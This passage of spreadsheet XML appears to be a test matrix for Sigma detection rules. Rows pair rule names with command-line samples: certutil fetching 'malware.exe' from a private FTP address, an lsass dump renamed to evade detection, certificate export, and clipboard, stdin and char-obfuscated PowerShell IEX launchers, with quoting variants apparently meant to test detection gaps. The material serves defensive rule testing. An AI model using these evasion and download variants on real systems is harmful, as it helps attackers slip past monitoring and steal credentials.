      </c>
      <c r="I7" s="43" t="n"/>
      <c r="J7" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K7" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="43" t="n"/>
      <c r="B8" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C8" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D8" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E8" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F8" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G8" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H8" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I8" s="36" t="n"/>
      <c r="J8" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K8" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B9" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C9" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D9" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E9" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F9" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G9" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H9" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I9" s="43" t="n"/>
      <c r="J9" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K9" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B10" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C10" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D10" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E10" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F10" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G10" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H10" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I10" s="43" t="n"/>
      <c r="J10" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K10" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B11" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C11" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D11" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E11" s="36" t="inlineStr">
        <is>
          <t>powershell -Nop -"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F11" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G11" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H11" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I11" s="43" t="n"/>
      <c r="J11" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K11" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B12" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C12" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D12" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E12" s="36" t="inlineStr">
        <is>
          <t>powershell /"nop" -"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F12" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G12" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H12" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I12" s="43" t="n"/>
      <c r="J12" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K12" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B13" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C13" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D13" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E13" s="36" t="inlineStr">
        <is>
          <t>powershell -"nop" -c "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F13" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G13" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H13" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I13" s="43" t="n"/>
      <c r="J13" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K13" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B14" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C14" s="43" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D14" s="43" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E14" s="43" t="inlineStr">
        <is>
          <t>powershell -NoProfile /"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F14" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G14" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H14" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I14" s="43" t="n"/>
      <c r="J14" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K14" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B15" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C15" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D15" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E15" s="36" t="inlineStr">
        <is>
          <t>powershell -"nop" /"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F15" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G15" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H15" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I15" s="43" t="n"/>
      <c r="J15" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K15" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B16" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C16" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D16" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E16" s="36" t="inlineStr">
        <is>
          <t>powershell -"nop" -"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F16" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G16" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H16" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I16" s="43" t="n"/>
      <c r="J16" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K16" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="43" t="n"/>
      <c r="B17" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C17" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D17" s="36" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E17" s="40" t="inlineStr">
        <is>
          <t>certutil.exe -urlcache -split -f ftp://192.168.1.100/malware.exe C:\        emp\malware.exe</t>
        </is>
      </c>
      <c r="F17" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G17" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H17" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I17" s="43" t="n"/>
      <c r="J17" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K17" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" s="42">
      <c r="A18" s="43" t="n"/>
      <c r="B18" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C18" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D18" s="36" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E18" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -UrLCACHe -"split" -f ftp://192.168.1.100/malware.exe C:\ emp\malware.exe</t>
        </is>
      </c>
      <c r="F18" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G18" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H18" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I18" s="43" t="n"/>
      <c r="J18" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K18" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" s="42">
      <c r="A19" s="43" t="n"/>
      <c r="B19" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C19" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D19" s="36" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E19" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -urlcache -split -f ftp://192.168.1.100/malware.exe C:\ emp\malware.exe</t>
        </is>
      </c>
      <c r="F19" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G19" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H19" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I19" s="43" t="n"/>
      <c r="J19" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K19" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" s="42">
      <c r="A20" s="43" t="n"/>
      <c r="B20" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode</t>
        </is>
      </c>
      <c r="C20" s="36" t="inlineStr">
        <is>
          <t>File Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D20" s="36" t="inlineStr">
        <is>
          <t>e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a</t>
        </is>
      </c>
      <c r="E20" s="36" t="inlineStr">
        <is>
          <t>copy certutil.exe totallynotcertutil.exe &amp; totallynotcertutil.exe -encode input.txt output.txt</t>
        </is>
      </c>
      <c r="F20" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G20" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H20" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I20" s="43" t="n"/>
      <c r="J20" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K20" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" s="42">
      <c r="A21" s="43" t="n"/>
      <c r="B21" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode_susp_location</t>
        </is>
      </c>
      <c r="C21" s="36" t="inlineStr">
        <is>
          <t>File In Suspicious Location Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D21" s="36" t="inlineStr">
        <is>
          <t>82a6714f-4899-4f16-9c1e-9a333544d4c3</t>
        </is>
      </c>
      <c r="E21" s="36" t="inlineStr">
        <is>
          <t>cd C:\Windows\Temp &amp;&amp; certutil.exe /"encode" payload.exe payload.b64</t>
        </is>
      </c>
      <c r="F21" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G21" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H21" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I21" s="36" t="n"/>
      <c r="J21" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K21" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" s="42">
      <c r="A22" s="43" t="n"/>
      <c r="B22" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_export_pfx</t>
        </is>
      </c>
      <c r="C22" s="36" t="inlineStr">
        <is>
          <t>Certificate Exported Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D22" s="36" t="inlineStr">
        <is>
          <t>3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5</t>
        </is>
      </c>
      <c r="E22" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -exportPFX        CurrentUser        C:\temp\cert.pfx</t>
        </is>
      </c>
      <c r="F22" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G22" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H22" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I22" s="43" t="n"/>
      <c r="J22" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K22" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" s="42">
      <c r="A23" s="43" t="n"/>
      <c r="B23" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C23" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D23" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E23" s="36" t="inlineStr">
        <is>
          <t>cmd /c "echo Write-Host 'Test Execution' | clip &amp; powershell -NoProfile -Command Add-Type -AssemblyName System.Windows.Forms; IEX([System.Windows.Forms.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F23" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G23" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H23" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I23" s="43" t="n"/>
      <c r="J23" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K23" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" s="42">
      <c r="A24" s="43" t="n"/>
      <c r="B24" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C24" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D24" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E24" s="36" t="inlineStr">
        <is>
          <t>cmd /c "echo Write-Host 'Bypass' | clip &amp; powershell.exe -nop -c \" iex([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F24" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G24" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H24" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I24" s="43" t="n"/>
      <c r="J24" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K24" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" s="42">
      <c r="A25" s="43" t="n"/>
      <c r="B25" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C25" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D25" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E25" s="36" t="inlineStr">
        <is>
          <t>cmd /c "echo Write-Host 'Test' | clip &amp; powershell -Sta -NoProfile -Command Add-Type -AssemblyName PresentationCore; Invoke-Expression ([System.Windows.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F25" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G25" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H25" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I25" s="43" t="n"/>
      <c r="J25" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K25" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" s="42">
      <c r="A26" s="43" t="n"/>
      <c r="B26" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C26" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D26" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E26" s="36" t="inlineStr">
        <is>
          <t>cmd /C "echo Write-Host 'Test' | clip &amp; powershell -Sta -NoProfile -Command Add-Type -AssemblyName PresentationCore; Invoke-Expression ([System.Windows.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F26" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G26" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H26" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I26" s="36" t="n"/>
      <c r="J26" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K26" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" s="42">
      <c r="A27" s="43" t="n"/>
      <c r="B27" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C27" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D27" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E27" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" -c "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F27" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G27" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H27" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I27" s="36" t="n"/>
      <c r="J27" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K27" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" s="42">
      <c r="A28" s="43" t="n"/>
      <c r="B28" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C28" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D28" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E28" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop /"Command" "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F28" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G28" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H28" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I28" s="36" t="n"/>
      <c r="J28" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K28" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" s="42">
      <c r="A29" s="43" t="n"/>
      <c r="B29" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C29" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D29" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E29" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nOpROFIle -"Command" "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F29" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G29" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H29" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I29" s="43" t="n"/>
      <c r="J29" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K29" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" s="42">
      <c r="A30" s="43" t="n"/>
      <c r="B30" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C30" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
      <c r="D30" s="36" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E30" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "&amp; ([string]::Join('', ([char]73, [char]69, [char]88))) 'Write-Host Educational_Test'"</t>
        </is>
      </c>
      <c r="F30" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G30" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H30" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I30" s="36" t="n"/>
      <c r="J30" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K30" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" s="42">
      <c r="A31" s="43" t="n"/>
      <c r="B31" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C31" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
      <c r="D31" s="36" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E31" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "&amp; ([string]::Join('', ([char]73, [char]69, [char]88))) 'Write-Host Educational_Test'"</t>
        </is>
      </c>
      <c r="F31" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G31" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H31" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I31" s="43" t="n"/>
      <c r="J31" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K31" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="32" ht="15.75" customHeight="1" s="42">
      <c r="A32" s="43" t="n"/>
      <c r="B32" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C32" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D32" s="36" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E32" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "echo Write-Host 'Bypass' | powershell.exe -noprofile -command -"</t>
        </is>
      </c>
      <c r="F32" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G32" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H32" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I32" s="43" t="n"/>
      <c r="J32" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K32" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" s="42">
      <c r="A33" s="43" t="n"/>
      <c r="B33" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C33" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D33" s="36" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E33" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "echo 'Write-Host Bypass' | powershell.exe -noexit -"</t>
        </is>
      </c>
      <c r="F33" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G33" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H33" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I33" s="43" t="n"/>
      <c r="J33" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K33" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" s="42">
      <c r="A34" s="43" t="n"/>
      <c r="B34" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C34" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D34" s="36" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E34" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "echo 'Write-Host Bypass' | powershell.exe -noexit -"</t>
        </is>
      </c>
      <c r="F34" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G34" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H34" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I34" s="43" t="n"/>
      <c r="J34" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K34" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="35" ht="15.75" customHeight="1" s="42">
      <c r="A35" s="43" t="n"/>
      <c r="B35" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C35" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D35" s="36" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E35" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F35" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G35" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H35" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I35" s="43" t="n"/>
      <c r="J35" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K35" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="36" ht="15.75" customHeight="1" s="42">
